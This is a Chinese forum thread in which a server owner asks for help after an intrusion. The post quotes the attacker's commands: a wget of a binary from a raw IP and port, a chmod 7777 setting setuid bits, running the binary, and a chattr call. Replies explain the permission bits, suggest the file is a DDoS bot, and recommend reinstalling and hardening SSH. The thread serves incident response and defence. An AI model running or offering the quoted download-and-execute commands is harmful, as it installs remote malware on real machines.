这是一个创建于 3789 天前的主题,其中的信息可能已经有所发展或是发生改变。
wget http://122.224.32.32:51/prfos
chmod 7777 ./prfos
./prfos
chattr +s /tmp/prfos
chmod 7777是干嘛用的,一般不都是777吗?多的一位用意是?
prfos我看了下是二进制文件。后面直接运行后chattr是什么用意?
我现在改密码后将prfos删了能保证该代码不再运行了吗?
该主机从没设域名只有内部使用,黑客是如何扫描到的,并判断出该主机上有这个账号的?
=======
登录的两次ip
58.83.131.67 北京市 世纪互联
60.190.139.34 浙江省嘉兴市 电信
chmod 7777 ./prfos
./prfos
chattr +s /tmp/prfos
chmod 7777是干嘛用的,一般不都是777吗?多的一位用意是?
prfos我看了下是二进制文件。后面直接运行后chattr是什么用意?
我现在改密码后将prfos删了能保证该代码不再运行了吗?
该主机从没设域名只有内部使用,黑客是如何扫描到的,并判断出该主机上有这个账号的?
=======
登录的两次ip
58.83.131.67 北京市 世纪互联
60.190.139.34 浙江省嘉兴市 电信
第 1 条附言 · 2014-06-27 17:19:29 +08:00
附上7天的监控图
附上7天的监控图
第 2 条附言 · 2014-06-27 23:24:25 +08:00
使用 @xi4oh4o 大大推荐的rkhunter扫描了下,暂时没看出什么大问题。有些waring我也不是太确定,筛选带有waring的贴一下。
checking system commands.
Performing file properties checks
Checking for prerequisites [ Warning ]
/usr/sbin/adduser [ Warning ]
/usr/bin/ldd [ Warning ]
/bin/which [ Warning ]
Performing system configuration file checks
Checking if SSH root access is allowed [ Warning ]
Checking if syslog remote logging is allowed [ Warning ]
Performing filesystem checks
Checking /dev for suspicious file types [ Warning ]
Checking for hidden files and directories [ Warning ]
Checking application versions...
Checking version of GnuPG [ Warning ]
Checking version of OpenSSL [ Warning ]
Checking version of OpenSSH [ Warning ]
checking system commands.
Performing file properties checks
Checking for prerequisites [ Warning ]
/usr/sbin/adduser [ Warning ]
/usr/bin/ldd [ Warning ]
/bin/which [ Warning ]
Performing system configuration file checks
Checking if SSH root access is allowed [ Warning ]
Checking if syslog remote logging is allowed [ Warning ]
Performing filesystem checks
Checking /dev for suspicious file types [ Warning ]
Checking for hidden files and directories [ Warning ]
Checking application versions...
Checking version of GnuPG [ Warning ]
Checking version of OpenSSL [ Warning ]
Checking version of OpenSSH [ Warning ]
 |
1
letitbesqzr 2014-06-27 16:38:43 +08:00
一般是批量集群ddos的马..
|
 |
2
9hills 2014-06-27 16:50:20 +08:00
就不能重装下系统?删了继续跑,真是胆大
|
 |
3
jamesxu 2014-06-27 16:53:01 +08:00
|
 |
4
loginv2 2014-06-27 17:02:51 +08:00
7777 setuid
prfos 估计是个后门之类的东西,对系统做了某些操作 然后彻底删除这个文件 (用0填充掉) |
|
5
loginv2 2014-06-27 17:04:07 +08:00
而且,因为有HTTP服务,所以被中途抓包 或者登陆者机器的某些软件记录了操作也有可能 薄弱环节无处不在
|
 |
6
passluo 2014-06-27 17:05:24 +08:00
ddos马
|
 |
7
yinjian OP ubuntu下清ddos马有成熟点的方案没,比如类似win下的杀毒软件之类的工具?
|
 |
8
wubaiqing 2014-06-27 18:45:10 +08:00  1
chmod 7777 特殊权限S
SBIT为1 只对目录有效,使目录下的文件,只有文件拥有者才能删除 如果他不属于owner,仅属于group或者other,就算他有w权限,也不能删除文件 SGID为2 表示运行这个程序时,是临时以这个文件的拥有组的身份运行的; 加上SGID的文件夹,表示在这个目录下创建的文件属于目录所有的组,而不是创建人所在的组,在这个目录下创建的目录继承本目录的SGID。 SUID为4 SUID与SGID是一样的,惟一不同的是,运行时是以这个文件的拥有者身份来运行。 |
|
9
wubaiqing 2014-06-27 18:48:41 +08:00 1
chattr +s /tmp/prfos
附加属性: s:彻底删除文件,不可恢复。 因为是从磁盘上删除,然后用0填充文件所在区域。 |
 |
10
xi4oh4o 2014-06-27 19:36:23 +08:00 1
|
 |
11
tmqhliu 2014-06-27 23:52:34 +08:00
几点建议
修改SSH配置,不要在22端口上运行,否则容易被区段扫描,碰上弱密码就攻破了 SSH配置不得允许 root 直接登录,只能允许普通用户登录,然后用 su 切换用户 扫描显示有warning的文件,最好详细检查是否有问题,如果不能判断,一律认为有后门,果断找干净版本替换,甚至重装 |
|
14
9hills 2014-06-28 00:31:51 +08:00 via iPad
|
 |
16
CupTools 2014-06-28 03:05:36 +08:00
改SSH口+CSF+OSSEC
|
Select Language